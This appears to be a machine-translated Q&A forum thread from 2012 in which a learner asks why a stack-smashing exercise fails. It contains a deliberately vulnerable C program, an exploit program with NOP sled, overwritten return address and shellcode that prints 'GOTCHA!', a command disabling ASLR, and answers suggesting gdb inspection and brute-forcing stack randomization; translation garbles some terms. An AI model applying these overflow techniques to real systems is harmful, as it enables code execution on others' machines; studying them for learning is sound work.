C溢出需要一些方向

我有2个程序，我试图做一些堆栈粉碎。C溢出需要一些方向

vuln.c

#include <stdlib.h> 
#include <stdio.h> 
int bof() 
{ 
    char buffer[8]; 
    FILE *badfile; 
    badfile = fopen("badfile", "r"); 
    fread(buffer, sizeof(char), 1024, badfile); 
    return 1; 
} 

int main(int argc, char **argv) 
{ 
    bof(); 
    printf("Not gonna do it! \n"); 
    return 1; 
}

exploit.c

#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 

char shellcode[] = 
"\xeb\x16" 
"\x31\xdb" 
"\x31\xd2" 
"\x31\xc0" 
"\x59" 
"\xbb\x01\x00\x00\x00" 
"\xb2\x09" 
"\xb0\x04" 
"\xcd\x80" 
"\xb0\x01" 
"\xcd\x80" 
"xe8\xe5\xff\xff\xff" 
"GOTCHA!\n"; 

#define OFFSET 1500 

    int bof() 
    { 
     char buffer[8]; 
     strcpy(buffer, "AAAAAAAAA"); 
     return 1; 
    } 

    unsigned long get_ESP(void) 
    { 
      __asm__("movl %ESP,%EAX"); 
    } 

    int main(int argc, char **argv) 
    { 
     unsigned int addr; 
     FILE *badfile; 
     char buffer[1024]; 
     addr = get_ESP()+OFFSET; 
     fprintf(stderr, "Using Offset: 0x%x\nShell code size: %lx\n",addr, sizeof(shellcode)); 
     memset(&buffer, 0x90, 1024); 
     buffer[12] = addr & 0x000000ff; 
     buffer[13] = (addr & 0x0000ff00) >> 8; 
     buffer[14] = (addr & 0x00ff0000) >> 16; 
     buffer[15] = (addr & 0xff000000) >> 24; 
     memcpy(&buffer[ (sizeof(buffer) - sizeof(shellcode)) ], shellcode,sizeof(shellcode)); 
     badfile = fopen("./badfile","w"); 
     fwrite(buffer,1024,1,badfile); 
     fclose(badfile); 

    }

我这些命令，gcc vuln.c -fno-stack-protector -o vuln和gcc exploit.c -fno-stack-protector -o exploit编译这对我的MacBook。我然后运行vuln，它运行正常，然后利用并获得此输出：

Using Offset: 0x6acd6814 
Shell code size: 28

我然后与腐败的od -t x2 badfile文件，所以它最终看起来像这样：

bash-3.2# cat badfile 
????????????h?j?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Y?? ?̀?̀xe8????GOTCHA!

我试图获得利用漏洞程序，以便打印GOTCHA！我现在得到Bus error: 10。任何人都可以给我一个暗示我要去哪里的错误？

__ _ __ _ __ _ __ _ __ _ __ _ __ _ __ _ _更新_ __ _ __ _ _

我尝试了与BT5相同的过程。使用echo 0 > /proc/sys/kernel/randomize_va_space禁用ASLR。我还是不明白为什么这样不起作用。我在gdb中运行时得到这个：

Program received signal SIGSEGV, Segmentation fault. 
0x90909090 in ??() 
(gdb)

我是否正确地尝试了？

来源

2012-04-19 atrueresistance

使用调试器遍历代码。这应该可以帮助您准确查看代码中发生总线错误的位置。 – bta 2012-04-19 01:11:38

编程接收信号EXC_BAD_ACCESS，无法访问存储器。原因：13地址：0x0000000000000000 0x0000000100000e89 in bof（） – atrueresistance 2012-04-19 01:12:47

现代操作系统做ASLR（地址空间布局随机化）。这意味着堆栈在exploit和vuln可执行文件中的位置不相同。您需要关闭ASLR或使用旧版操作系统（例如Linux 2.4，不包含ASLR补丁）以使此代码正常工作。 – 2012-04-19 01:13:23

我不确定OSX有什么样的保护 - 这可能会在Linux上更好地工作。

无论如何，基本的想法看起来很好 - 你的易受攻击的程序会打开一个大文件并将其转储到一个小数组中。问题似乎是您的文件创建。

当你得到ESP时，你会得到当前程序的堆栈指针。这对易受攻击的程序没有影响，除非堆栈在两者中完全相同（不是这样）。

什么可能会更好地工作，实际上是在gdb中执行易受攻击的程序，直到你点击bof（）并查看堆栈指针。如果这是一致的，那么你赢了。如果它是随机的（我的猜测是这样），那么你将需要使用你的诺基亚和希望。

在32位机器上，堆栈随机化不会太多，反复尝试利用应该最终会让您获得成功的攻击。

祝你好运！

来源

2012-04-19 01:15:59 Michael

C溢出需要一些方向

回答

相关问题